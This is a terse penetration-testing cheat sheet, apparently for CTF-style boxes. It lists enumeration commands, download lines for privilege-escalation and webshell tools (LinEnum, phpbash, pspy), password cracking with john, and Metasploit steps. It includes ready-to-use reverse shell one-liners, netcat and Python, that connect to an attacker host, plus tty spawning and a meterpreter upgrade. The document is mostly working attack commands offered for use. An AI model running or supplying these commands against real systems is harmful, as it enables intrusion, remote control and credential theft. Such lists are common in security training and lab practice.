Commands

AUTO SET UP SCRIPT.

wget wolffpat.github.io/runDasScripts.sh

#find world writable files. This is a MUST.
find / -type f -writable 2> /dev/null

#find world writable directories
find / -type d -writable 2> /dev/null

##using find commands to find secific files
find / -type f -iname "string" 2>/dev/null

##find directory with a specific name
find / -type d -iname "string" 2>/dev/null

#hosting a simple Python server to communicating between victim and attacker

--python2--
python -m SimpleHTTPServer 80

--python3--
py -m http.server 80

#easy download for LinEnum.sh (an enumeration script for basic priv enum)--
wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh

#Easy Download for PHPBASH (a powerful webshell with a proper terminal
wget https://raw.githubusercontent.com/Arrexel/phpbash/master/phpbash.php

###NMAP####
-sV = service scan( use this to detect what is running on a port)
-sC = Script scan
-sP = pingSweep. used for discovering ip connections.

###stealth snooping tools for running processes on a computer PSPY
wget https://github.com/DominicBreuker/pspy/releases/download/v1.2.0/pspy64s

###NMAPautomator
EASY but TAKES SOME TIME
wget https://raw.githubusercontent.com/21y4d/nmapAutomator/master/nmapAutomator.sh

###install vulners###
cd /usr/share/nmap/scripts
wget https://raw.githubusercontent.com/vulnersCom/nmap-vulners/master/vulners.nse

##directory brute forcing###
DIRBUSTER IS A COMMON ONE BUT THE GUI ISN'T THE BEST fairly easy to use however
launch by typing dirbuster into terminal

####install gobuster####
apt-get install gobuster

###JOHN TO CRACK ANYTHING###
john passtocrack.txt --wordlist=/usr/share/wordlist/rockyou.txt

####GTFOBINS####
https://gtfobins.github.io/

###ippsec.rocks###
https://ippsec.rocks/

###SUDO COMMAND LIST####
sudo -l

###adding metasploit modules####
msfdb init
cd $HOME/.msf4
mkdir modules
cd modules
mkdir exploits
cd exploits
mkdir *exploitName*
cd *exploitName*
wget exploit

###REVERSE SHELLS BABY!!!####
quick examples:
nc -e /bin/sh attacker 1234
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

##FULL LIST OF REVERSE SHELLS####
http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet

###SPAWNING a tty shell####
python -c 'import pty; pty.spawn("/bin/bash")'
/bin/bash -i

###FULL LIST####
https://netsec.ws/?p=337

###how to upgrade from base shell to meterpreter####
get shell in metasploit
ctrl Z
press y then enter
use /post/multi/manage/shell_to_meterpreter
set LHOST to your personal host not the loopback
sessions -i
find your running session number
set SESSION *session number*
run
"Meterpreter session start on session X"
sessions -i X